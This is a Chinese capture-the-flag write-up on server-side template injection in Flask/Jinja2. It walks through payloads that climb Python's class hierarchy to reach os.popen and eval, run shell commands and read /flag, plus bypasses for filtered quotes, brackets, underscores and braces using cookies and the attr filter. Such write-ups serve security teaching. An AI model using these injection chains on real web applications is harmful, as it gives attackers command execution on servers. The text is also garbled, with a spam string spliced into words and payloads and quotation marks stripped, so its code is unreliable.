SSTI就是服务器端模板注入(Server-Side Template Injection),实际上也是一种注入漏洞;可以类比于SQL注入,实际上这两者的基本思想是一致的;
SSTI也是获取SEO靠我了一个输入,然后在后端的渲染处理上进行了语句的拼接,之后便是执行;SSTI利用的是现在网站模板引擎(Python的jinja2、mako、tornado、django;PHP的smarty、twig;SEO靠我JAVA的jade、等等),当在运用这些框架对运用渲染函数生成html的时候便会出现SSTI的问题
什么是模板引擎?
模板引擎(这里特指用于Web开发的模板引擎)是为了使用户界面与业务数据(内容)分离而产SEO靠我生的,它可以生成特定格式的文档,用于网站的模板引擎就会生成一个标准的HTML文档。
简单来说就是利用模板引擎来生成一套前端HTML代码,只需要获取用户的数据,然后放到渲染函数中,之后便生成模板+用户数据SEO靠我的前端HTML页面,然后反馈给浏览器,呈现在用户的面前
渲染函数在渲染的时候,往往不会对用户输入的变量进行渲染;
这是在网上找到的图片,根据处理返回值的不同来判断SSSEO靠我TI的类型:
__class__用来查看变量所属的类,格式为:变量.__class__
.__class__ #<class str> ().__classSEO靠我__ #<class tuple> {}.__class__ #<class dict> [].__class__ #<class list>__baSEO靠我ses__用来查看类的基类,注意是类的基类,所以格式应该是:变量.__class__.__bases__
>>> .__class__.__bases__ (<class object>SEO靠我,) >>> ().__class__.__bases__ (<class object>,) >>> {}.__class__.__bases__ SEO靠我 (<class object>,) >>> [].__class__.__bases__ (<class object>,)同时也可以加上数组,来指定获取SEO靠我第几个基类;例如:变量.__class__.bases__[0] 代表着获取第一个基类
还有一个类是__mro__,他显示类和基类,这是与__bases__不同的地方:
>>> .__class__.__SEO靠我mro__ (<class str>, <class object>)__subclasses__()用来查看当前类的子类,格式为:变量.__class__SEO靠我.__bases__[0].__subclasses__()
当然和__bases__一样,也可以加上数组,来查看指定的索引值:
>>> .__class__.__bases__[0].__subclasSEO靠我ses__()[0] <class type>进入首页:(回头看hint,发现”名字就是考点“,SEO靠我经过测试传参为name)
传递参数?name={{7*7}},得到回显为49
根据上文提到的,先来找变量所属的类以及当前的类的基类是什么,用空字符来测试;
在Python中,所有的类都会继承Object类,SEO靠我如果定义一个类没有指定继承某个类,那么默认继承的是Object类
?name={{.__class__.__bases__[0]}}之后便是找类的子类,使用的就是__subclasses__()
?namSEO靠我e={{.__class__.__bases__[0].__subclasses__()}}找到所有的子类的集合之后,我们需要找出一个能够使用的类,要求这个类的某一个方法能够被我们用于执行和寻找flaSEO靠我g
这里使用的是第133个类(第一个类的索引值为0):
之后便是实例化这个类,使用__init__(初始化类,返回的类型是function),实例化类之后,通过全局变量globals来查看所有的方法(初始SEO靠我化类之后,使用function.__globals__来查看function所处空间下可使用的module、方法和所有的变量)
?name={{.__class__.__bases__[0].__subSEO靠我classes__()[132].__init__.__globals__}}根据方法来获取flag
?name={{.__class__.__bases__[0].__subclasses__()[1SEO靠我32].__init__.__globals__[popen](ls /).read()}} ?name={{.__class__.__bases__[0].__subclasses_SEO靠我_()[132].__init__.__globals__[popen](cat /flag).read()}}"开始过滤了..." 首页还是一样的!
还是按照上面的方法先试试:
到这里还是可SEO靠我以的,也就是说我们可以获得第一个基类下面的所有的子类的集合,但是发现无法使用第133个类:
PS:因为过滤了数字2 3
这里就需要另谋他路了,上面附上了一张类的知识的总结表(转载);其中存在下面的几个知识SEO靠我点:
__builtins__:内建名称空间,内建名称空间有许多名字到对象之间映射,而这些名字其实就是内建函数的名称,对象就是这些内建函数本身。即里面有很多常用的函数(比如说eval、import)。
uSEO靠我rl_for:flask的一个方法,可以用于得到__builtins__,而且url_for.__globals__[__builtins__]含有current_app。
get_flashed_meSEO靠我ssages:flask的一个方法,可以用于得到__builtins__,而且get_flashed_messages.__globals__[__builtins__]含有current_app。
lSEO靠我ipsum:flask的一个方法,可以用于得到__builtins__,而且lipsum.__globals__含有os模块:{{lipsum.__globals__[os].popen(ls).reSEO靠我ad()}}
所以可以使用上面的三种方法来得到__builtins__,之后便是内含的模块,进行命令执行获取flag;
?name={{url_for.__globals__.__builtins__[eSEO靠我val]("__import__(os).popen(ls /).read()")}} ?name={{get_flashed_messages.__globals__.__builtSEO靠我ins__[eval]("__import__(os).popen(cat /flag).read()")}} ?name={{lipsum.__globals__.__builtinSEO靠我s__[eval]("__import__(os).popen(cat /flag).read()")}}还有一种方法可以获取到__builtins__:
?name={{xx.__init__.__gSEO靠我lobals__}}这里的xx可以是26个英文字符的任意组合;
PS:过滤了单双引号
利用request方法绕过:
我们还是利用上面的payload来打,唯一被过滤的地方就是单双引号,我们先来看SEO靠我看上一关的payload和使用request方法绕过单双引号的payload有什么不一样:
?name={{get_flashed_messages.__globals__.__builtins__.eSEO靠我val(request.args.x1)}}&x1=__import__(os).popen(ls).read() #上面的payload是使用了request来绕过引号,而下面的paSEO靠我yload就是我们正常的payload ?name={{get_flashed_messages.__globals__.__builtins__.eval("__import__(oSEO靠我s).popen(ls).read()")}}经过测试发现还是过滤了单双引号,并且还过滤args;可以更换请求方式例如POST、Cookie的方式传递参数;
但是在使用post方式的时候,提SEO靠我示:
使用cookie便可绕过;
?name={{lipsum.__globals__.__builtins__.eval(request.cookies.x)}} cookie: x=_SEO靠我_import__(os).popen(cat /flag).read()用上面的payload继续打还是可以打通的;过滤引号以及中括号
?name={{url_for.__globals_SEO靠我_.os.popen(request.cookies.x).read()}} Cookie: x = ls /?name={{url_for.__globals__.os.popen(SEO靠我request.cookies.x).read()}} Cookie: x = cat /flag过滤引号、中括号、args还过滤了下划线,那么现在的问题就是想办法绕过下划SEO靠我线;经过百度查询,同样还是利用request.values来绕过,但是题目中还是过滤了中括号的:
?name={{lipsum.(request.cookies.globals).(request.coSEO靠我okies.builtins).eval(request.cookies.x)}}
cookie:globals=__globals__;builtins=__builtins__;x=__importSEO靠我__(os).popen(ls /).read()
发现这种方式是会出现500错误的;这里要使用的是attr() 他是flask自带的过滤器
"".__class__ 相当于 ""|attr("__claSEO靠我ss__")
PS:常用于”.“号或者是下划线被过滤
?name={{lipsum.__globals__.__builtins__.os.popen(ls /).read()}} ?naSEO靠我me={{(lipsum|attr(request.cookies.x1)).os.popen(request.cookies.x2).read()}}过滤了引号、中括号、下划线
同样还是使SEO靠我用上面的payload继续打:
发现还是可以打通的,但是后面使用os的时候,发现被过滤了:可以使用request.cookies.a来绕过;
?name={{(lipsum|attr(request.coSEO靠我okies.a)).get(request.cookies.b).popen(request.cookies.c).read()}}经过测试发现,应该是在上面的题目的基础上增加过滤“{{“SEO靠我开头, 以”}}“结尾;
使用的是%和print来绕过;
?name={%print(lipsum|attr(request.cookies.a)).get(request.cookies.b).popeSEO靠我n(request.cookies.c).read()%}文章参考:https://blog.csdn.net/rfrder/article/details/113866139
https://blogSEO靠我.csdn.net/miuzzx/article/details/110220425
https://blog.csdn.net/qq_42880719/article/details/12269971SEO靠我0?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522167695429516782427448079%2522%252C%2522scmSEO靠我%2522%253A%252220140713.130102334.pc%255Fall.%2522%257D&request_id=167695429516782427448079&biz_id=0SEO靠我&utm_medium=distribute.pc_search_result.none-task-blog-2~all~first_rank_ecpm_v1~rank_v31_ecpm-7-1226SEO靠我99710-null-null.142^v73^pc_search_v2,201^v4^add_ask,239^v2^insert_chatgpt&utm_term=ctfshow%20ssti&spSEO靠我m=1018.2226.3001.4187
网站备案号:浙ICP备17034767号-2